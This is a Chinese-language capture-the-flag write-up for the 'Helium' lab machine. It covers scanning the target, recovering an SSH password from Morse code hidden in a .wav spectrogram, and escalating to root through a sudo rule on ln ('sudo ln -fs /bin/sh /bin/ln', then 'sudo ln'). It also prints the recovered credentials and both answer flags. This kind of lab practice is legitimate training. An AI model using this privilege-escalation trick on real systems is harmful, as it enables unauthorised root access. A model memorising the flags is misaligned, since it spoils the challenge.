Helium
备注
[Linux VM] [Tested on VirtualBox] created by || sml
⏲️ Release Date // 2020-11-22
✔️ MD5 // 6c034ba16620358483d344f0572ad020
☠ Root // 159
💀 User // 163
📝Notes // Enjoy. Tested on virtualbox.
靶机启动
靶机 IP:
192.168.56.110
nmap 信息搜集
Nmap scan report for 192.168.56.110
Host is up (0.00051s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 12f6555fc6fafb1415ae4a2b38d84a30 (RSA)
| 256 b7ac876dc4f9e39ad46ee04fdaaa2220 (ECDSA)
|_ 256 fee805af234d3a822a649bf735e4444a (ED25519)
80/tcp open http nginx 1.14.2
|_http-title: RELAX
|_http-server-header: nginx/1.14.2
MAC Address: 08:00:27:0E:BF:60 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
探测 web 服务
查看原始返回
┌─[randark@randark-Parrot]─[~/tmp/HackMyVM-Vulny]
└──╼ $http get http://192.168.56.110/
HTTP/1.1 200 OK
Connection: keep-alive
Content-Encoding: gzip
Content-Type: text/html
Date: Sat, 23 Dec 2023 14:54:31 GMT
ETag: W/"5fbaba1e-212"
Last-Modified: Sun, 22 Nov 2020 19:21:02 GMT
Server: nginx/1.14.2
Transfer-Encoding: chunked
<title>RELAX</title>
<!doctype html>
<html lang="en">
<!-- Please paul, stop uploading weird .wav files using /upload_sound -->
<head>
<style>
body {
background-image: url('screen-1.jpg');
background-repeat: no-repeat;
background-attachment: fixed;
background-size: 100% 100%;
}
</style>
<link href="bootstrap.min.css" rel="stylesheet">
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<body>
<audio src="relax.wav" preload="auto loop" controls></audio>
</body>
发现可能存在以下用户
paul
尝试目录扫描,并结合已经得到信息,得到以下信息
http://192.168.56.110/upload_sound/
http://192.168.56.110/yay/
http://192.168.56.110/bootstrap.min.css
访问 http://192.168.56.110/bootstrap.min.css
得到:
/yay/mysecretsound.wav
分析 wav 文件
将文件下载到本地后,使用 audacity
进行查看
发现频谱图存在信息,使用 Morse Code Adaptive Audio Decoder | Morse Code World 进行查看
发现提取出来两份字符串:
ETAIE4SIET
dancingpassyo
结合上文得到的用户名,怀疑是 SSH 的登录凭据
凭据利用
利用一下凭据
paul:dancingpassyo
登陆成功
┌─[randark@randark-Parrot]─[~]
└──╼ $pwncat-cs paul@192.168.56.110
[11:24:13] Welcome to pwncat 🐈! __main__.py:164
Password: *************
[11:24:20] 192.168.56.110:22: normalizing shell path manager.py:957
[11:24:21] 192.168.56.110:22: registered new host w/ db manager.py:957
(local) pwncat$ back
(remote) paul@helium:/home/paul$ whoami
paul
user pwned
(remote) paul@helium:/home/paul$ cat user.txt
ilovetoberelaxed
提权探测
sudo -l
Matching Defaults entries for paul on helium:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User paul may run the following commands on helium:
(ALL : ALL) NOPASSWD: /usr/bin/ln
发现可以无密码执行 /usr/bin/ln
程序
尝试提权
(remote) paul@helium:/home/paul$ sudo ln -fs /bin/sh /bin/ln
(remote) paul@helium:/home/paul$ sudo ln
[](remote)[] []root@helium[]:[]/home/paul[]$ whoami
root
root pwned
[](remote)[] []root@helium[]:[]/root[]$ cat root.txt
ilovetoberoot